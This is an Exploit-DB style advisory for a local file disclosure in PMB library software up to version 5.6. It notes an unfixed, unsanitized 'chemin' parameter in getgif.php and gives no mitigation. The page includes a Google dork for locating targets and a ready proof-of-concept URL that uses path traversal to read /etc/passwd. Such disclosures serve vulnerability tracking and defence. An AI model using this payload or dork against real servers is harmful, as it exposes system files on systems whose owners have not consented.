PMB 5.6 - 'chemin' Local File Disclosure

vendor:

by:

41-trk (Tarik Bakir)

N/A

CVSS

N/A

Local File Disclosure

CWE

Product Name:

Affected Version From:

Affected Version To: <= 5.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 18.04.1

2020

PMB 5.6 – ‘chemin’ Local File Disclosure

The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure.

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
# Date: 2020-10-13
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6 
# Tested on: Ubuntu 18.04.1

The PMB Gif Image is not sanitizing the 'chemin',
which leads to Local File Disclosure.

As of today (2020-10-13) this issue is unfixed.

Vulnerable code: (getgif.php )

line 55    $fp2=@fopen($chemin, "rb");
line 68    fpassthru($fp)


========================= Proof-of-Concept ===================================================

    http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik